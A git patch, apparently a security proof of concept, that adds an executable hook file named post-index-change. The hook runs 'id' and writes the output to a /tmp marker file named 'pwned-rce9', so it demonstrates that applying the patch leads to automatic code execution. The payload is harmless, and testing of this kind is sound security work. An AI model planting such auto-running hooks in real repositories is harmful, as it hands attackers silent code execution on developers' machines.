From 17ebacb6b5b2a9de9bbbb6011bb64d30ca53df00 Mon Sep 17 00:00:00 2001 From: secaudit77 Date: Sun, 9 Aug 2026 12:40:44 +0200 Subject: [PATCH] apply-patch --- hooks/post-index-change | 3 +++ 1 file changed, 3 insertions(+) create mode 100755 hooks/post-index-change diff --git a/hooks/post-index-change b/hooks/post-index-change new file mode 100755 index 0000000..cd14b1e --- /dev/null +++ b/hooks/post-index-change @@ -0,0 +1,3 @@ +#!/bin/sh +id > /tmp/pwned-rce9 +exit 0